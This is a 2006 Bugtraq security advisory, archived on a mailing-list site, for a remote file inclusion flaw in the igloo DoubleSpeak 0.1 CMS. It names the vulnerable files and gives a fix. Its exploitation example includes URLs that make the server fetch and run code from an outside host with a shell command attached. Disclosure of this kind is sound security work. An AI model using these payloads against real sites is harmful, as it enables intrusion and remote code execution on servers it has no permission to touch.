lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 11 Jun 2006 20:47:48 -0000
From: aminrayden@...oo.com
To: bugtraq@...urityfocus.com
Subject: igloo DoubleSpeak v 0.1 Multiple remote file inclusion


igloo DoubleSpeak v 0.1 Multiple remote file inclusion
-----------------------------------------------------
Aria-security.com advisory
Bug Discovered by R@...N (amin emami)
Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt
email:AminRayden@...oo.com
Date:12/06/2006
-----------------------------------------------------
Affected software description:
IGLOO DoubleSpeak <= 0.1
Vendor:http://sourceforge.net/projects/iglooweb/
Vulnerability:Multiple remote file inclusion
-----------------------------------------------------
Summary:
DoubleSpeak, formerly known as the Igloo Weblog, 
aims to be the easiest to use and most customizable CMS (content management system) on the Internet.
-----------------------------------------------------
Vulnerable code:
require "config.inc";
  
require "$config[private]/local.inc";
-----------------------------------------------------
Proof of concept:
The problem exists is in the below files when used the variable $config[private]  in a require() function without being Declared
index.php
faq.php
hardware.php
ianal.php
links.php
login.php
logout.php
new_stories.php
old.php
poll.php
rtfm.php
software.php
TODO.php
/admin/add_links.php
/admin/add_story.php
/admin/add_poll.php
/admin/index.php
/admin/view_story_queue.php
/ui/create_acct.php
/ui/submit_story.php
/ui/suggest_poll.php
/ui/suggest_topic.php
/ui/vote_on_polls.php
-----------------------------------------------------
Exploitation example:
http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
...

-----------------------------------------------------
Fix:
turn off register_globals and add this code before vulnerable code
$config[private] = "./";

===========================
Aria Security Research
Http://www.aria-security.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ